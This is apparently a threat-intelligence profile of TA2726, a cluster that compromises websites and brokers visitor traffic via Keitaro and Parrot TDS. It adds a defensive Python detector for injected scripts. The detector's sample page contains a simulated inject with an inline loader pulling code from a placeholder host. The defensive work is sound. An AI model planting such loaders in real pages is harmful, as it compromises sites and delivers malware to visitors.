Mallory

TA2726

Also known as: TA2726

TA2726 is a financially motivated threat actor cluster assessed to operate primarily as a traffic provider, or traffic distribution service (TDS), for other threat actors. Reporting links the cluster to the operation of Parrot TDS and to abuse of Keitaro TDS (also marketed as Keitaro Tracker), including the use of stolen or cracked Keitaro licenses.

The cluster's business model, as described in the reporting, is to compromise legitimate websites, inject Keitaro TDS links into them, and then sell or broker the resulting visitor traffic to customers, including other malware operators. Multiple reports state that TA2726 supplied traffic in this way to SocGholish (FakeUpdates) and to TA2727. Proofpoint assessed that TA2726 may act as a traffic distribution service for other actors, and that both TA2726 and TA2727 took part in web-inject campaigns that used fake browser update lures. FrigidStealer activity has been linked to both clusters.

Tactics and tradecraft explicitly mentioned in the reporting: use of traffic distribution systems, website compromise, malicious web injects, fake browser update lures, and traffic brokering and resale. TA2726 is also described as operating the infrastructure that routes victims to downstream malicious activity.

The reporting does not attribute malware development to TA2726. The high-confidence characterization is that the cluster provides and monetizes the traffic and redirection infrastructure that other actors use to deliver their own payloads.
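The tradecraft above (a legitimate site is compromised, a script reference pointing at the TDS is injected, and the TDS then routes a subset of visitors to a fake browser update lure) suggests two defensive checks a site owner can run. The first diffs the script sources a page loads against a known-good baseline and flags any new third-party host or new inline script. The second fetches the same page as different visitor types and reports script hosts that only appear for some of them, since a TDS decides per visitor (by user agent, referrer, geography and so on) whether to serve the redirect, so a single crawler fetch can miss it. This is an added example, not code from Mallory or from the reporting; the HTML pages, the first-party host list and the `tds-placeholder.test` domain are constructed placeholders, not TA2726 indicators.

```python
"""Web-inject detection by baseline diff and visitor-variant comparison (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and inline <script> bodies from one page."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of every <script src=...>
        self.inline = []        # body of every inline <script>...</script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf).strip())


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def external_hosts(srcs):
    """Hostnames of absolute or protocol-relative script URLs; relative paths are first-party."""
    hosts = set()
    for src in srcs:
        host = urlparse(src).hostname
        if host:
            hosts.add(host)
    return hosts


def find_injected_scripts(baseline_html, current_html, first_party_hosts):
    """Scripts present now that were neither in the baseline nor served from a first-party host."""
    base_ext, base_inline = collect_scripts(baseline_html)
    cur_ext, cur_inline = collect_scripts(current_html)
    known = set(first_party_hosts) | external_hosts(base_ext)
    findings = []
    for src in cur_ext:
        host = urlparse(src).hostname
        if host and host not in known:
            findings.append({"type": "new_external_script", "host": host, "src": src})
    for body in cur_inline:
        if body not in base_inline:
            findings.append({"type": "new_inline_script", "snippet": body[:80]})
    return findings


def hosts_varying_by_visitor(variants):
    """Script hosts that appear for some visitor types but not all: a TDS cloaking tell.

    `variants` maps a label (e.g. "crawler", "browser_from_search") to the HTML
    returned for that visitor profile.
    """
    if not variants:
        return set()
    per_variant = [external_hosts(collect_scripts(html)[0]) for html in variants.values()]
    union = set().union(*per_variant)
    common = set.intersection(*per_variant)
    return union - common


# Constructed sample pages (placeholder hosts, not reported indicators).
FIRST_PARTY = {"www.example.com"}
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script>window.siteConfig = {lang: "en"};</script>
</head><body>Hello</body></html>"""

# Same page after a hypothetical inject: one new external script tag plus an
# inline loader that drops a second script from the same placeholder host.
CURRENT_HTML = BASELINE_HTML.replace(
    "</head>",
    '<script src="https://tds-placeholder.test/r.js?id=1"></script>\n'
    '<script>var t=document.createElement("script");'
    't.src="https://tds-placeholder.test/b.js";document.head.appendChild(t);</script>\n'
    "</head>",
)

if __name__ == "__main__":
    for finding in find_injected_scripts(BASELINE_HTML, CURRENT_HTML, FIRST_PARTY):
        print(finding)
    print("hosts served only to some visitors:",
          hosts_varying_by_visitor({"crawler": BASELINE_HTML, "browser": CURRENT_HTML}))
```

In practice the baseline is the page as captured at a known-clean point (or as stored in source control), and the variant fetches should include at least a search-engine crawler user agent and a consumer browser user agent with a search-engine referrer, because the referrer-from-search plus desktop-browser combination is the kind of visitor a fake-update lure is aimed at.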


ARSENAL

Associated malware families

1 malware family attributed to this actor across reporting.

IOCS

Observables

22 indicators attributed to this actor across reporting: domains, IPs, hashes, and other artifacts.